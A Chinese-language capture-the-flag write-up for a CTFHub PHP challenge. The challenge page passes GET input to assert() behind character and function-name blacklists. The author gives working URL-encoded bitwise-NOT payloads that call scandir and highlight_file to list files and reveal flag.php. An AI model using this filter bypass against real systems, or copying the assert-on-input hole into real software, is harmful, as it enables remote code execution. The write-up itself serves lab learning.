靶场环境:https://www.ctfhub.com/#/challenge 上面搜索hate
打开网页:
<?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me'); } $blacklist = get_defined_functions()['internal']; foreach ($blacklist as $blackitem) { if (preg_match ('/' . $blackitem . '/im', $code)) { die('You deserve better'); } } assert($code); }
题目过滤:1.过滤相关关键字 2.过滤函数 方法1:异或 方法2:取反 方法3:数组 方法4:PCRE 方法5:换行符 ............
利用取反绕过过滤 Payload: <?php echo urlencode(~'print_r'); //urlencode url编码 ~ 取反 echo "\n"; echo urlencode(~'scandir'); echo "\n"; echo urlencode(~'.'); echo "\n"; echo urlencode(~'highlight_file'); echo "\n"; echo urlencode(~'flag.php'); ?> print_r(scandir('.')) //打印当前目录下的文件 /?code=(~%8F%8D%96%91%8B%A0%8D)((~%8C%9C%9E%91%9B%96%8D)((~%D1))) highlight_file('flag.php') ?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)((~%99%93%9E%98%D1%8F%97%8F))
显示flag.php
highlight_file('flag.php') ?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)((~%99%93%9E%98%D1%8F%97%8F))
<?php
error_reporting(0);
if(!isset($_GET['code'])){
highlight_file(__FILE__);
}else{
$code = $_GET['code'];
if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) {
die('You are too good for me');
}
$blacklist = get_defined_functions()['internal'];
foreach ($blacklist as $blackitem) {
if (preg_match ('/' . $blackitem . '/im', $code)) {
die('You deserve better');
}
}
assert($code);
}